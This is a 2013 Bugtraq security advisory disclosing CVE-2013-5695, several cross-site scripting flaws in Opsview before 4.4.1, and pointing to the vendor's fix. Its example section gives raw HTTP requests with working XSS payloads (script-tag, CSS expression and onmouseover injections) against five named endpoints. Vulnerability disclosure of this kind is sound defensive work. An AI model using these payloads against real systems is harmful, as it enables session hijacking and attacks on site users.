'CVE-2013-5695 Multilple Cross Site Scripting (XSS) Attacks in Ops View'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    CVE-2013-5695 Multilple Cross Site Scripting (XSS) Attacks in Ops View
From:       "J. Oquendo" <sil () e-fensive ! net>
Date:       2013-10-28 13:59:11
Message-ID: 20131028135911.GA10366 () e-fensive ! net
[Download RAW message or body]

CVE-2013-5695 Multilple Cross Site Scripting (XSS) Attacks in Ops View
Version(s): Opsview pre 4.4.1
Author: J. Oquendo (joquendo at e-fensive dot net)


I. ADVISORY

Title: Multilple Cross Site Scripting (XSS) Attacks in Ops View
Date published: 2013-10-28
Vendor contacted: 2013-09-04


II. BACKGROUND

Opsview is a systems management software built on open
source software. To minimize noise, read more about it
here

http://www.opsview.com/about-us


II. DESCRIPTION

Opsview is vulnerable to a few different XSS based attacks.

/admin/auditlog
/info/host/
/login
/status/service/recheck
/viewport/

There are a variety of iterations within those functions
which may allow a malicious user to trigger a cross site
scripting attack.


III. EXAMPLE

GET /admin/auditlog/?id=1%3cScRiPt%20%3eprompt%28ohnoes%29%3c%2fMY XSS SCRIPT HERE%3e \
                HTTP/1.1
Host: 10.20.30.68:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Opera/5.54 (Windows NT 5.1; U)  [en]

------------

GET /info/host/1%3Cdiv%20style=width:expression(prompt(ohnoes))%3E
HTTP/1.1
Host: 10.20.30.68:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Opera/5.54 (Windows NT 5.1; U)  [en]

------------

POST /login HTTP/1.1
Content-Length: 125
Content-Type: application/x-www-form-urlencoded
Host: 10.20.30.68:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Opera/5.54 (Windows NT 5.1; U)  [en]

app=OPSVIEW&back=%22%20onmouseover%3dprompt%28ohnoes%29%20xss%3d%22&login=Sign+in&login_password=no&login_username=no


------------

POST /status/service/recheck HTTP/1.1
Content-Length: 144
Content-Type: application/x-www-form-urlencoded
User-Agent: Opera/5.54 (Windows NT 5.1; U)  [en]

&from=%22%20onmouseover%3dprompt%28ohnoes%29%20xss%3d%22&host_selection=opsview&service_selection=opsview%3bConnectivity%20-%20LAN&submit=Submit


------------

GET /viewport/1%3Cdiv%20style=width:expression(prompt(ohnoes))%3E
HTTP/1.1
Host: 10.20.30.68:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Opera/5.54 (Windows NT 5.1; U)  [en]

Host: 10.20.30.68:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Opera/5.54 (Windows NT 5.1; U)  [en]

III SOLUTION

Opsview released a fix with Opsview 4.4.1 
http://docs.opsview.com/doku.php?id=opsview4.4:changes#fixes

-- 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP, GREM

"Where ignorance is our master, there is no possibility of
real peace" - Dalai Lama

42B0 5A53 6505 6638 44BB  3943 2BF7 D83F 210A 95AF
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x2BF7D83F210A95AF


[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic